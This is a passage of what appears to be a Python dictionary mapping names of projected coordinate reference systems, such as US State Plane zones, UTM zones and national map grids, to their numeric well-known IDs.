'World_Goode_Homolosine_Ocean': 54053, 'NAD_1927_StatePlane_Guam_FIPS_5400': 65061, 'American_Samoa_1962_StatePlane_American_Samoa_FIPS_5300': 65062, 'NAD_1983_StatePlane_Guam_FIPS_5400': 65161, 'NAD_1983_StatePlane_Kentucky_FIPS_1600': 65163, 'Canada_Albers_Equal_Area_Conic': 102001, 'Canada_Lambert_Conformal_Conic': 102002, 'USA_Contiguous_Albers_Equal_Area_Conic': 102003, 'USA_Contiguous_Lambert_Conformal_Conic': 102004, 'USA_Contiguous_Equidistant_Conic': 102005, 'NAD_1983_Alaska_Albers': 102006, 'Hawaii_Albers_Equal_Area_Conic': 102007, 'North_America_Albers_Equal_Area_Conic': 102008, 'North_America_Lambert_Conformal_Conic': 102009, 'North_America_Equidistant_Conic': 102010, 'Africa_Sinusoidal': 102011, 'Asia_Lambert_Conformal_Conic': 102012, 'Europe_Albers_Equal_Area_Conic': 102013, 'Europe_Lambert_Conformal_Conic': 102014, 'South_America_Lambert_Conformal_Conic': 102015, 'North_Pole_Azimuthal_Equidistant': 102016, 'North_Pole_Lambert_Azimuthal_Equal_Area': 102017, 'North_Pole_Stereographic': 102018, 'South_Pole_Azimuthal_Equidistant': 102019, 'South_Pole_Lambert_Azimuthal_Equal_Area': 102020, 'South_Pole_Stereographic': 102021, 'Africa_Albers_Equal_Area_Conic': 102022, 'Africa_Equidistant_Conic': 102023, 'Africa_Lambert_Conformal_Conic': 102024, 'Asia_North_Albers_Equal_Area_Conic': 102025, 'Asia_North_Equidistant_Conic': 102026, 'Asia_North_Lambert_Conformal_Conic': 102027, 'Asia_South_Albers_Equal_Area_Conic': 102028, 'Asia_South_Equidistant_Conic': 102029, 'Asia_South_Lambert_Conformal_Conic': 102030, 'Europe_Equidistant_Conic': 102031, 'South_America_Equidistant_Conic': 102032, 'South_America_Albers_Equal_Area_Conic': 102033, 'North_Pole_Gnomonic': 102034, 'North_Pole_Orthographic': 102035, 'South_Pole_Gnomonic': 102036, 'South_Pole_Orthographic': 102037, 'The_World_From_Space': 102038, 'USA_Contiguous_Albers_Equal_Area_Conic_USGS_version': 102039, 'D48_Slovenia_TM': 102060, 'Everest_Modified_1969_RSO_Malaya_Meters': 102061, 'Kertau_RSO_Malaya_Meters': 102062, 'Kandawala_Ceylon_Belt_Meters': 102063, 'Kandawala_Ceylon_Belt_Indian_Yards_1937': 102064, 'S-JTSK_Krovak': 102065, 'S-JTSK_Ferro_Krovak_East_North': 102066, 'S-JTSK_Krovak_East_North': 102067, 'EMEP_50_Kilometer_Grid': 102068, 'EMEP_150_Kilometer_Grid': 102069, 'Guernsey_Grid': 102070, 'AGD_1966_ACT_Grid_AGC_Zone': 102071, 'AGD_1966_ISG_54_2': 102072, 'AGD_1966_ISG_54_3': 102073, 'AGD_1966_ISG_55_1': 102074, 'AGD_1966_ISG_55_2': 102075, 'AGD_1966_ISG_55_3': 102076, 'AGD_1966_ISG_56_1': 102077, 'AGD_1966_ISG_56_2': 102078, 'AGD_1966_ISG_56_3': 102079, 'Bermuda_2000_National_Grid': 102090, 'Monte_Mario_Italy_1': 102091, 'Monte_Mario_Italy_2': 102092, 'Roma_1940_Gauss_Boaga_Est': 102093, 'Roma_1940_Gauss_Boaga_Ovest': 102094, 'JAD_2001_Jamaica_Grid': 102095, 'Bab_South_Palau_Azimuthal_Equidistant': 102096, 'ETRS_1989_UTM_Zone_26N': 102097, 'ETRS_1989_UTM_Zone_27N': 102098, 'ETRS_1989_UTM_Zone_39N': 102099, 'WGS_1984_Web_Mercator_Auxiliary_Sphere': 102100, 'NGO_1948_Norway_Zone_1': 102101, 'NGO_1948_Norway_Zone_2': 102102, 'NGO_1948_Norway_Zone_3': 102103, 'NGO_1948_Norway_Zone_4': 102104, 'NGO_1948_Norway_Zone_5': 102105, 'NGO_1948_Norway_Zone_6': 102106, 'NGO_1948_Norway_Zone_7': 102107, 'NGO_1948_Norway_Zone_8': 102108, 'ETRS_1989_Slovenia_TM': 102109, 'RGF_1993_Lambert_93': 102110, 'Chatham_Islands_1979_Map_Grid': 102111, 'NZGD_2000_Chatham_Island_Circuit': 102112, 'WGS_1984_Web_Mercator': 102113, 'Old_Hawaiian_UTM_Zone_4N': 102114, 'Old_Hawaiian_UTM_Zone_5N': 102115, 'American_Samoa_1962_UTM_Zone_2S': 102116, 'NAD_1927_Alaska_Albers_Meters': 102117, 'NAD_1927_Georgia_Statewide_Albers': 102118, 'NAD_1927_Texas_Statewide_Mapping_System': 102119, 'NAD_1927_Michigan_GeoRef_Feet_US': 102120, 'NAD_1983_Michigan_GeoRef_Feet_US': 102121, 'NAD_1927_Michigan_GeoRef_Meters': 102122, 'NAD_1983_Michigan_GeoRef_Meters': 102123, 'NAD_1927_UTM_Zone_1N': 102124, 'NAD_1927_UTM_Zone_2N': 102125, 'NAD_1927_UTM_Zone_59N': 102126, 'NAD_1927_UTM_Zone_60N': 102127, 'NAD_1983_UTM_Zone_1N': 102128, 'NAD_1983_UTM_Zone_2N': 102129, 'NAD_1983_UTM_Zone_59N': 102130, 'NAD_1983_UTM_Zone_60N': 102131, 'NGO_1948_UTM_Zone_32N': 102132, 'NGO_1948_UTM_Zone_33N': 102133, 'NGO_1948_UTM_Zone_34N': 102134, 'NGO_1948_UTM_Zone_35N': 102135, 'NGO_1948_Baerum_Kommune': 102136, 'NGO_1948_Bergenhalvoen': 102137, 'NGO_1948_Oslo_Kommune': 102138, 'EUREF_FIN_TM35FIN': 102139, 'Hong_Kong_1980_Grid': 102140, 'Hong_Kong_1980_UTM_Zone_49N': 102141, 'Hong_Kong_1980_UTM_Zone_50N': 102142, 'QND_1995_UTM_39N': 102143, 'Merchich_Degree_UTM_Zone_28N': 102144, 'JGD_2000_UTM_Zone_51N': 102145, 'JGD_2000_UTM_Zone_52N': 102146, 'JGD_2000_UTM_Zone_53N': 102147, 'JGD_2000_UTM_Zone_54N': 102148, 'JGD_2000_UTM_Zone_55N': 102149, 'JGD_2000_UTM_Zone_56N': 102150, 'Tokyo_UTM_Zone_51N': 102151, 'Tokyo_UTM_Zone_52N': 102152, 'Tokyo_UTM_Zone_53N': 102153, 'Tokyo_UTM_Zone_54N': 102154, 'Tokyo_UTM_Zone_55N': 102155, 'Tokyo_UTM_Zone_56N': 102156, 'ETRS_1989_Kosovo_Grid': 102157, 'Jordan_JTM': 102158, 'Observatorio_Meteorologico_1965_Macau_Grid': 102159, 'Datum_73_Hayford_Gauss_IGeoE': 102160, 'Datum_73_Hayford_Gauss_IPCC': 102161, 'Graciosa_Base_SW_1948_UTM_Zone_26N': 102162, 'Lisboa_Bessel_Bonne': 102163, 'Lisboa_Hayford_Gauss_IGeoE': 102164, 'Lisboa_Hayford_Gauss_IPCC': 102165, 'Observ_Meteorologico_1939_UTM_Zone_25N': 102166, 'Porto_Santo_1936_UTM_Zone_28N': 102167, 'Sao_Braz_UTM_Zone_26N': 102168, 'Selvagem_Grande_1938_UTM_Zone_28N': 102169, 'AGD_1966_VICGRID': 102170, 'GDA_1994_VICGRID94': 102171, 'GDA_1994_South_Australia_Lambert': 102172, 'ETRS_1989_UWPP_1992': 102173, 'ETRS_1989_UWPP_2000_PAS_5': 102174, 'ETRS_1989_UWPP_2000_PAS_6': 102175, 'ETRS_1989_UWPP_2000_PAS_7': 102176, 'ETRS_1989_UWPP_2000_PAS_8': 102177, 'NAD_1927_10TM_AEP_Forest': 102178, 'NAD_1927_10TM_AEP_Resource': 102179, 'NAD_1927_3TM_111': 102180, 'NAD_1927_3TM_114': 102181, 'NAD_1927_3TM_117': 102182, 'NAD_1927_3TM_120': 102183, 'NAD_1983_10TM_AEP_Forest': 102184, 'NAD_1983_10TM_AEP_Resource': 102185, 'NAD_1983_3TM_111': 102186, 'NAD_1983_3TM_114': 102187, 'NAD_1983_3TM_117': 102188, 'NAD_1983_3TM_120': 102189, 'NAD_1983_BC_Environment_Albers': 102190, 'Nord_Maroc_Degree': 102191, 'Sud_Maroc_Degree': 102192, 'Sahara_Degree': 102193, 'UWPP_1992': 102194, 'UWPP_2000_PAS_5': 102195, 'UWPP_2000_PAS_6': 102196, 'UWPP_2000_PAS_7': 102197, 'UWPP_2000_PAS_8': 102198, 'Belge_Lambert_2008': 102199, 'NAD_1983_HARN_UTM_Zone_2S': 102200, 'NAD_1983_HARN_Guam_Map_Grid': 102201, 'NAD_1983_HARN_UTM_Zone_4N': 102202, 'NAD_1983_HARN_UTM_Zone_5N': 102203, 'NAD_1983_HARN_UTM_Zone_11N': 102205, 'NAD_1983_HARN_UTM_Zone_12N': 102206, 'NAD_1983_HARN_UTM_Zone_13N': 102207, 'NAD_1983_HARN_Maine_2000_East_Zone': 102208, 'NAD_1983_HARN_Maine_2000_Central_Zone': 102209, 'NAD_1983_HARN_Maine_2000_West_Zone': 102210, 'NAD_1983_HARN_UTM_Zone_18N': 102211, 'NAD_1983_USFS_R6_Albers': 102218, 'NAD_1983_Wisconsin_TM_US_Ft': 102219, 'NAD_1983_HARN_Wisconsin_TM_US_Ft': 102220, 'Ocotepeque_1935_Costa_Rica_Lambert_Norte': 102221, 'Ocotepeque_1935_Costa_Rica_Lambert_Sur': 102222, 'WGS_1984_Costa_Rica_TM_90': 102223, 'MONREF_1997_UTM_Zone_46N': 102224, 'MONREF_1997_UTM_Zone_47N': 102225, 'MONREF_1997_UTM_Zone_48N': 102226, 'MONREF_1997_UTM_Zone_49N': 102227, 'MONREF_1997_UTM_Zone_50N': 102228, 'NAD_1983_HARN_StatePlane_Alabama_East_FIPS_0101': 102229, 'NAD_1983_HARN_StatePlane_Alabama_West_FIPS_0102': 102230, 'Colombia_West_West_Zone': 102231, 'Bogota_Ciudad_Bogota': 102232, 'MAGNA_Ciudad_Bogota': 102233, 'NAD_1983_CSRS_UTM_Zone_14N': 102234, 'NAD_1983_CSRS_UTM_Zone_15N': 102235, 'NAD_1983_CSRS_UTM_Zone_16N': 102236, 'Pohnpei_Az_Eq_1971': 102237, 'Saipan_Az_Eq_1969': 102238, 'Guam_Geodetic_Triangulation_Network_1963': 102239, 'Guam_Geodetic_Network_1993': 102240, 'NAD_1983_HARN_StatePlane_California_I_FIPS_0401': 102241, 'NAD_1983_HARN_StatePlane_California_II_FIPS_0402': 102242, 'NAD_1983_HARN_StatePlane_California_III_FIPS_0403': 102243, 'NAD_1983_HARN_StatePlane_California_IV_FIPS_0404': 102244, 'NAD_1983_HARN_StatePlane_California_V_FIPS_0405': 102245, 'NAD_1983_HARN_StatePlane_California_VI_FIPS_0406': 102246, 'NAD_1983_HARN_StatePlane_Arizona_East_FIPS_0201': 102248, 'NAD_1983_HARN_StatePlane_Arizona_Central_FIPS_0202': 102249, 'NAD_1983_HARN_StatePlane_Arizona_West_FIPS_0203': 102250, 'NAD_1983_HARN_StatePlane_Arkansas_North_FIPS_0301': 102251, 'NAD_1983_HARN_StatePlane_Arkansas_South_FIPS_0302': 102252, 'NAD_1983_HARN_StatePlane_Colorado_North_FIPS_0501': 102253, 'NAD_1983_HARN_StatePlane_Colorado_Central_FIPS_0502': 102254, 'NAD_1983_HARN_StatePlane_Colorado_South_FIPS_0503': 102255, 'NAD_1983_HARN_StatePlane_Connecticut_FIPS_0600': 102256, 'NAD_1983_HARN_StatePlane_Delaware_FIPS_0700': 102257, 'NAD_1983_HARN_StatePlane_Florida_East_FIPS_0901': 102258, 'NAD_1983_HARN_StatePlane_Florida_West_FIPS_0902': 102259, 'NAD_1983_HARN_StatePlane_Florida_North_FIPS_0903': 102260, 'NAD_1983_HARN_StatePlane_Hawaii_1_FIPS_5101': 102261, 'NAD_1983_HARN_StatePlane_Hawaii_2_FIPS_5102': 102262, 'NAD_1983_HARN_StatePlane_Hawaii_3_FIPS_5103': 102263, 'NAD_1983_HARN_StatePlane_Hawaii_4_FIPS_5104': 102264, 'NAD_1983_HARN_StatePlane_Hawaii_5_FIPS_5105': 102265, 'NAD_1983_HARN_StatePlane_Georgia_East_FIPS_1001': 102266, 'NAD_1983_HARN_StatePlane_Georgia_West_FIPS_1002': 102267, 'NAD_1983_HARN_StatePlane_Idaho_East_FIPS_1101': 102268, 'NAD_1983_HARN_StatePlane_Idaho_Central_FIPS_1102': 102269, 'NAD_1983_HARN_StatePlane_Idaho_West_FIPS_1103': 102270, 'NAD_1983_HARN_StatePlane_Illinois_East_FIPS_1201': 102271, 'NAD_1983_HARN_StatePlane_Illinois_West_FIPS_1202': 102272, 'NAD_1983_HARN_StatePlane_Indiana_East_FIPS_1301': 102273, 'NAD_1983_HARN_StatePlane_Indiana_West_FIPS_1302': 102274, 'NAD_1983_HARN_StatePlane_Iowa_North_FIPS_1401': 102275, 'NAD_1983_HARN_StatePlane_Iowa_South_FIPS_1402': 102276, 'NAD_1983_HARN_StatePlane_Kansas_North_FIPS_1501': 102277, 'NAD_1983_HARN_StatePlane_Kansas_South_FIPS_1502': 102278, 'NAD_1983_HARN_StatePlane_Kentucky_North_FIPS_1601': 102279, 'NAD_1983_HARN_StatePlane_Kentucky_South_FIPS_1602': 102280, 'NAD_1983_HARN_StatePlane_Louisiana_North_FIPS_1701': 102281, 'NAD_1983_HARN_StatePlane_Louisiana_South_FIPS_1702': 102282, 'NAD_1983_HARN_StatePlane_Maine_East_FIPS_1801': 102283, 'NAD_1983_HARN_StatePlane_Maine_West_FIPS_1802': 102284, 'NAD_1983_HARN_StatePlane_Maryland_FIPS_1900': 102285, 'NAD_1983_HARN_StatePlane_Massachusetts_Mainland_FIPS_2001': 102286, 'NAD_1983_HARN_StatePlane_Massachusetts_Island_FIPS_2002': 102287, 'NAD_1983_HARN_StatePlane_Michigan_North_FIPS_2111': 102288, 'NAD_1983_HARN_StatePlane_Michigan_Central_FIPS_2112': 102289, 'NAD_1983_HARN_StatePlane_Michigan_South_FIPS_2113': 102290, 'NAD_1983_HARN_StatePlane_Minnesota_North_FIPS_2201': 102291, 'NAD_1983_HARN_StatePlane_Minnesota_Central_FIPS_2202': 102292, 'NAD_1983_HARN_StatePlane_Minnesota_South_FIPS_2203': 102293, 'NAD_1983_HARN_StatePlane_Mississippi_East_FIPS_2301': 102294, 'NAD_1983_HARN_StatePlane_Mississippi_West_FIPS_2302': 102295, 'NAD_1983_HARN_StatePlane_Missouri_East_FIPS_2401': 102296, 'NAD_1983_HARN_StatePlane_Missouri_Central_FIPS_2402': 102297, 'NAD_1983_HARN_StatePlane_Missouri_West_FIPS_2403': 102298, 'NAD_1983_HARN_StatePlane_Montana_FIPS_2500': 102300, 'NAD_1983_HARN_StatePlane_Nebraska_FIPS_2600': 102304, 'NAD_1983_HARN_StatePlane_Nevada_East_FIPS_2701': 102307, 'NAD_1983_HARN_StatePlane_Nevada_Central_FIPS_2702': 102308, 'NAD_1983_HARN_StatePlane_Nevada_West_FIPS_2703': 102309, 'NAD_1983_HARN_StatePlane_New_Hampshire_FIPS_2800': 102310, 'NAD_1983_HARN_StatePlane_New_Jersey_FIPS_2900': 102311, 'NAD_1983_HARN_StatePlane_New_Mexico_East_FIPS_3001': 102312, 'NAD_1983_HARN_StatePlane_New_Mexico_Central_FIPS_3002': 102313, 'NAD_1983_HARN_StatePlane_New_Mexico_West_FIPS_3003': 102314, 'NAD_1983_HARN_StatePlane_New_York_East_FIPS_3101': 102315, 'NAD_1983_HARN_StatePlane_New_York_Central_FIPS_3102': 102316, 'NAD_1983_HARN_StatePlane_New_York_West_FIPS_3103': 102317, 'NAD_1983_HARN_StatePlane_New_York_Long_Island_FIPS_3104': 102318, 'NAD_1983_HARN_StatePlane_North_Dakota_North_FIPS_3301': 102320, 'NAD_1983_HARN_StatePlane_North_Dakota_South_FIPS_3302': 102321, 'NAD_1983_HARN_StatePlane_Ohio_North_FIPS_3401': 102322, 'NAD_1983_HARN_StatePlane_Ohio_South_FIPS_3402': 102323, 'NAD_1983_HARN_StatePlane_Oklahoma_North_FIPS_3501': 102324, 'NAD_1983_HARN_StatePlane_Oklahoma_South_FIPS_3502': 102325, 'NAD_1983_HARN_StatePlane_Oregon_North_FIPS_3601': 102326, 'NAD_1983_HARN_StatePlane_Oregon_South_FIPS_3602': 102327, 'NAD_1983_HARN_StatePlane_Rhode_Island_FIPS_3800': 102330, 'NAD_1983_HARN_StatePlane_South_Dakota_North_FIPS_4001': 102334, 'NAD_1983_HARN_StatePlane_South_Dakota_South_FIPS_4002': 102335, 'NAD_1983_HARN_StatePlane_Tennessee_FIPS_4100': 102336, 'NAD_1983_HARN_StatePlane_Texas_North_FIPS_4201': 102337, 'NAD_1983_HARN_StatePlane_Texas_North_Central_FIPS_4202': 102338, 'NAD_1983_HARN_StatePlane_Texas_Central_FIPS_4203': 102339, 'NAD_1983_HARN_StatePlane_Texas_South_Central_FIPS_4204': 102340, 'NAD_1983_HARN_StatePlane_Texas_South_FIPS_4205': 102341, 'NAD_1983_HARN_StatePlane_Utah_North_FIPS_4301': 102342, 'NAD_1983_HARN_StatePlane_Utah_Central_FIPS_4302': 102343, 'NAD_1983_HARN_StatePlane_Utah_South_FIPS_4303': 102344, 'NAD_1983_HARN_StatePlane_Vermont_FIPS_4400': 102345, 'NAD_1983_HARN_StatePlane_Virginia_North_FIPS_4501': 102346, 'NAD_1983_HARN_StatePlane_Virginia_South_FIPS_4502': 102347, 'NAD_1983_HARN_StatePlane_Washington_North_FIPS_4601': 102348, 'NAD_1983_HARN_StatePlane_Washington_South_FIPS_4602': 102349, 'NAD_1983_HARN_StatePlane_West_Virginia_North_FIPS_4701': 102350, 'NAD_1983_HARN_StatePlane_West_Virginia_South_FIPS_4702': 102351, 'NAD_1983_HARN_StatePlane_Wisconsin_North_FIPS_4801': 102352, 'NAD_1983_HARN_StatePlane_Wisconsin_Central_FIPS_4802': 102353, 'NAD_1983_HARN_StatePlane_Wisconsin_South_FIPS_4803': 102354, 'NAD_1983_HARN_StatePlane_Wyoming_East_FIPS_4901': 102355, 'NAD_1983_HARN_StatePlane_Wyoming_East_Central_FIPS_4902': 102356, 'NAD_1983_HARN_StatePlane_Wyoming_West_Central_FIPS_4903': 102357, 'NAD_1983_HARN_StatePlane_Wyoming_West_FIPS_4904': 102358, 'NAD_1983_HARN_StatePlane_Puerto_Rico_Virgin_Islands_FIPS_5200': 102361, 'NAD_1983_HARN_StatePlane_Kentucky_FIPS_1600': 102363, 'WGS_1984_ARC_System_Zone_01': 102421, 'WGS_1984_ARC_System_Zone_02': 102422, 'WGS_1984_ARC_System_Zone_03': 102423, 'WGS_1984_ARC_System_Zone_04': 102424, 'WGS_1984_ARC_System_Zone_05': 102425, 'WGS_1984_ARC_System_Zone_06': 102426, 'WGS_1984_ARC_System_Zone_07': 102427, 'WGS_1984_ARC_System_Zone_08': 102428, 'WGS_1984_ARC_System_Zone_09': 102429, 'WGS_1984_ARC_System_Zone_10': 102430, 'WGS_1984_ARC_System_Zone_11': 102431, 'WGS_1984_ARC_System_Zone_12': 102432, 'WGS_1984_ARC_System_Zone_13': 102433, 'WGS_1984_ARC_System_Zone_14': 102434, 'WGS_1984_ARC_System_Zone_15': 102435, 'WGS_1984_ARC_System_Zone_16': 102436, 'WGS_1984_ARC_System_Zone_17': 102437, 'WGS_1984_ARC_System_Zone_18': 102438, 'LKS_1992_Latvia_TM_0': 102440, 'TWD_1967_TM_Taiwan': 102441, 'TWD_1967_TM_Penghu': 102442, 'TWD_1997_TM_Taiwan': 102443, 'TWD_1997_TM_Penghu': 102444, 'NAD_1983_HARN_StatePlane_Hawaii_1_FIPS_5101_Feet': 102461, 'NAD_1983_HARN_StatePlane_Hawaii_2_FIPS_5102_Feet': 102462, 'NAD_1983_HARN_StatePlane_Hawaii_3_FIPS_5103_Feet': 102463, 'NAD_1983_HARN_StatePlane_Hawaii_4_FIPS_5104_Feet': 102464, 'NAD_1983_HARN_StatePlane_Hawaii_5_FIPS_5105_Feet': 102465, 'NAD_1983_HARN_StatePlane_Minnesota_North_FIPS_2201_Feet': 102466, 'NAD_1983_HARN_StatePlane_Minnesota_Central_FIPS_2202_Feet': 102467, 'NAD_1983_HARN_StatePlane_Minnesota_South_FIPS_2203_Feet': 102468, 'NAD_1983_HARN_Mississippi_TM': 102469, 'Nord_Algerie_Ancienne_Degree': 102491, 'Sud_Algerie_Ancienne_Degree': 102492, 'WGS_1984_Complex_UTM_Zone_20N': 102570, 'WGS_1984_Complex_UTM_Zone_21N': 102571, 'WGS_1984_Complex_UTM_Zone_22N': 102572, 'WGS_1984_Complex_UTM_Zone_23N': 102573, 'WGS_1984_Complex_UTM_Zone_24N': 102574, 'WGS_1984_Complex_UTM_Zone_25N': 102575, 'WGS_1984_Complex_UTM_Zone_26N': 102576, 'WGS_1984_Complex_UTM_Zone_27N': 102577, 'WGS_1984_Complex_UTM_Zone_28N': 102578, 'WGS_1984_Complex_UTM_Zone_29N': 102579, 'WGS_1984_Complex_UTM_Zone_30N': 102580, 'NTF_France_I_degrees': 102581, 'NTF_France_II_degrees': 102582, 'NTF_France_III_degrees': 102583, 'NTF_France_IV_degrees': 102584, 'Nord_Algerie_Degree': 102591, 'Sud_Algerie_Degree': 102592, 'NAD_1983_Texas_Centric_Mapping_System_Albers': 102601, 'NAD_1983_Texas_Centric_Mapping_System_Lambert': 102602, 'NAD_1983_Texas_Statewide_Mapping_System': 102603, 'NAD_1983_Georgia_Statewide_Lambert': 102604, 'NAD_1983_Idaho_TM': 102605, 'NAD_1983_Maine_2000_East_Zone': 102606, 'NAD_1983_Maine_2000_Central_Zone': 102607, 'NAD_1983_Maine_2000_West_Zone': 102608, 'NAD_1983_Mississippi_TM': 102609, 'NAD_1983_StatePlane_Alabama_East_FIPS_0101_Feet': 102629, 'NAD_1983_StatePlane_Alabama_West_FIPS_0102_Feet': 102630, 'NAD_1983_StatePlane_Alaska_1_FIPS_5001_Feet': 102631, 'NAD_1983_StatePlane_Alaska_2_FIPS_5002_Feet': 102632, 'NAD_1983_StatePlane_Alaska_3_FIPS_5003_Feet': 102633, 'NAD_1983_StatePlane_Alaska_4_FIPS_5004_Feet': 102634, 'NAD_1983_StatePlane_Alaska_5_FIPS_5005_Feet': 102635, 'NAD_1983_StatePlane_Alaska_6_FIPS_5006_Feet': 102636, 'NAD_1983_StatePlane_Alaska_7_FIPS_5007_Feet': 102637, 'NAD_1983_StatePlane_Alaska_8_FIPS_5008_Feet': 102638, 'NAD_1983_StatePlane_Alaska_9_FIPS_5009_Feet': 102639, 'NAD_1983_StatePlane_Alaska_10_FIPS_5010_Feet': 102640, 'NAD_1983_StatePlane_California_I_FIPS_0401_Feet': 102641, 'NAD_1983_StatePlane_California_II_FIPS_0402_Feet': 102642, 'NAD_1983_StatePlane_California_III_FIPS_0403_Feet': 102643, 'NAD_1983_StatePlane_California_IV_FIPS_0404_Feet': 102644, 'NAD_1983_StatePlane_California_V_FIPS_0405_Feet': 102645, 'NAD_1983_StatePlane_California_VI_FIPS_0406_Feet': 102646, 'NAD_1983_StatePlane_Arizona_East_FIPS_0201_Feet': 102648, 'NAD_1983_StatePlane_Arizona_Central_FIPS_0202_Feet': 102649, 'NAD_1983_StatePlane_Arizona_West_FIPS_0203_Feet': 102650, 'NAD_1983_StatePlane_Arkansas_North_FIPS_0301_Feet': 102651, 'NAD_1983_StatePlane_Arkansas_South_FIPS_0302_Feet': 102652, 'NAD_1983_StatePlane_Colorado_North_FIPS_0501_Feet': 102653, 'NAD_1983_StatePlane_Colorado_Central_FIPS_0502_Feet': 102654, 'NAD_1983_StatePlane_Colorado_South_FIPS_0503_Feet': 102655, 'NAD_1983_StatePlane_Connecticut_FIPS_0600_Feet': 102656, 'NAD_1983_StatePlane_Delaware_FIPS_0700_Feet': 102657, 'NAD_1983_StatePlane_Florida_East_FIPS_0901_Feet': 102658, 'NAD_1983_StatePlane_Florida_West_FIPS_0902_Feet': 102659, 'NAD_1983_StatePlane_Florida_North_FIPS_0903_Feet': 102660, 'NAD_1983_StatePlane_Hawaii_1_FIPS_5101_Feet': 102661, 'NAD_1983_StatePlane_Hawaii_2_FIPS_5102_Feet': 102662, 'NAD_1983_StatePlane_Hawaii_3_FIPS_5103_Feet': 102663, 'NAD_1983_StatePlane_Hawaii_4_FIPS_5104_Feet': 102664, 'NAD_1983_StatePlane_Hawaii_5_FIPS_5105_Feet': 102665, 'NAD_1983_StatePlane_Georgia_East_FIPS_1001_Feet': 102666, 'NAD_1983_StatePlane_Georgia_West_FIPS_1002_Feet': 102667, 'NAD_1983_StatePlane_Idaho_East_FIPS_1101_Feet': 102668, 'NAD_1983_StatePlane_Idaho_Central_FIPS_1102_Feet': 102669, 'NAD_1983_StatePlane_Idaho_West_FIPS_1103_Feet': 102670, 'NAD_1983_StatePlane_Illinois_East_FIPS_1201_Feet': 102671, 'NAD_1983_StatePlane_Illinois_West_FIPS_1202_Feet': 102672, 'NAD_1983_StatePlane_Indiana_East_FIPS_1301_Feet': 102673, 'NAD_1983_StatePlane_Indiana_West_FIPS_1302_Feet': 102674, 'NAD_1983_StatePlane_Iowa_North_FIPS_1401_Feet': 102675, 'NAD_1983_StatePlane_Iowa_South_FIPS_1402_Feet': 102676, 'NAD_1983_StatePlane_Kansas_North_FIPS_1501_Feet': 102677, 'NAD_1983_StatePlane_Kansas_South_FIPS_1502_Feet': 102678, 'NAD_1983_StatePlane_Kentucky_North_FIPS_1601_Feet': 102679, 'NAD_1983_StatePlane_Kentucky_South_FIPS_1602_Feet': 102680, 'NAD_1983_StatePlane_Louisiana_North_FIPS_1701_Feet': 102681, 'NAD_1983_StatePlane_Louisiana_South_FIPS_1702_Feet': 102682, 'NAD_1983_StatePlane_Maine_East_FIPS_1801_Feet': 102683, 'NAD_1983_StatePlane_Maine_West_FIPS_1802_Feet': 102684, 'NAD_1983_StatePlane_Maryland_FIPS_1900_Feet': 102685, 'NAD_1983_StatePlane_Massachusetts_Mainland_FIPS_2001_Feet': 102686, 'NAD_1983_StatePlane_Massachusetts_Island_FIPS_2002_Feet': 102687, 'NAD_1983_StatePlane_Michigan_North_FIPS_2111_Feet': 102688, 'NAD_1983_StatePlane_Michigan_Central_FIPS_2112_Feet': 102689, 'NAD_1983_StatePlane_Michigan_South_FIPS_2113_Feet': 102690, 'NAD_1983_StatePlane_Minnesota_North_FIPS_2201_Feet': 102691, 'NAD_1983_StatePlane_Minnesota_Central_FIPS_2202_Feet': 102692, 'NAD_1983_StatePlane_Minnesota_South_FIPS_2203_Feet': 102693, 'NAD_1983_StatePlane_Mississippi_East_FIPS_2301_Feet': 102694, 'NAD_1983_StatePlane_Mississippi_West_FIPS_2302_Feet': 102695, 'NAD_1983_StatePlane_Missouri_East_FIPS_2401_Feet': 102696, 'NAD_1983_StatePlane_Missouri_Central_FIPS_2402_Feet': 102697, 'NAD_1983_StatePlane_Missouri_West_FIPS_2403_Feet': 102698, 'NAD_1983_StatePlane_Montana_FIPS_2500_Feet': 102700, 'NAD_1983_StatePlane_Nebraska_FIPS_2600_Feet': 102704, 'NAD_1983_StatePlane_Nevada_East_FIPS_2701_Feet': 102707, 'NAD_1983_StatePlane_Nevada_Central_FIPS_2702_Feet': 102708, 'NAD_1983_StatePlane_Nevada_West_FIPS_2703_Feet': 102709, 'NAD_1983_StatePlane_New_Hampshire_FIPS_2800_Feet': 102710, 'NAD_1983_StatePlane_New_Jersey_FIPS_2900_Feet': 102711, 'NAD_1983_StatePlane_New_Mexico_East_FIPS_3001_Feet': 102712, 'NAD_1983_StatePlane_New_Mexico_Central_FIPS_3002_Feet': 102713, 'NAD_1983_StatePlane_New_Mexico_West_FIPS_3003_Feet': 102714, 'NAD_1983_StatePlane_New_York_East_FIPS_3101_Feet': 102715, 'NAD_1983_StatePlane_New_York_Central_FIPS_3102_Feet': 102716, 'NAD_1983_StatePlane_New_York_West_FIPS_3103_Feet': 102717, 'NAD_1983_StatePlane_New_York_Long_Island_FIPS_3104_Feet': 102718, 'NAD_1983_StatePlane_North_Carolina_FIPS_3200_Feet': 102719, 'NAD_1983_StatePlane_North_Dakota_North_FIPS_3301_Feet': 102720, 'NAD_1983_StatePlane_North_Dakota_South_FIPS_3302_Feet': 102721, 'NAD_1983_StatePlane_Ohio_North_FIPS_3401_Feet': 102722, 'NAD_1983_StatePlane_Ohio_South_FIPS_3402_Feet': 102723, 'NAD_1983_StatePlane_Oklahoma_North_FIPS_3501_Feet': 102724, 'NAD_1983_StatePlane_Oklahoma_South_FIPS_3502_Feet': 102725, 'NAD_1983_StatePlane_Oregon_North_FIPS_3601_Feet': 102726, 'NAD_1983_StatePlane_Oregon_South_FIPS_3602_Feet': 102727, 'NAD_1983_StatePlane_Pennsylvania_North_FIPS_3701_Feet': 102728, 'NAD_1983_StatePlane_Pennsylvania_South_FIPS_3702_Feet': 102729, 'NAD_1983_StatePlane_Rhode_Island_FIPS_3800_Feet': 102730, 'NAD_1983_StatePlane_South_Carolina_FIPS_3900_Feet': 102733, 'NAD_1983_StatePlane_South_Dakota_North_FIPS_4001_Feet': 102734, 'NAD_1983_StatePlane_South_Dakota_South_FIPS_4002_Feet': 102735, 'NAD_1983_StatePlane_Tennessee_FIPS_4100_Feet': 102736, 'NAD_1983_StatePlane_Texas_North_FIPS_4201_Feet': 102737, 'NAD_1983_StatePlane_Texas_North_Central_FIPS_4202_Feet': 102738, 'NAD_1983_StatePlane_Texas_Central_FIPS_4203_Feet': 102739, 'NAD_1983_StatePlane_Texas_South_Central_FIPS_4204_Feet': 102740, 'NAD_1983_StatePlane_Texas_South_FIPS_4205_Feet': 102741, 'NAD_1983_StatePlane_Utah_North_FIPS_4301_Feet': 102742, 'NAD_1983_StatePlane_Utah_Central_FIPS_4302_Feet': 102743, 'NAD_1983_StatePlane_Utah_South_FIPS_4303_Feet': 102744, 'NAD_1983_StatePlane_Vermont_FIPS_4400_Feet': 102745, 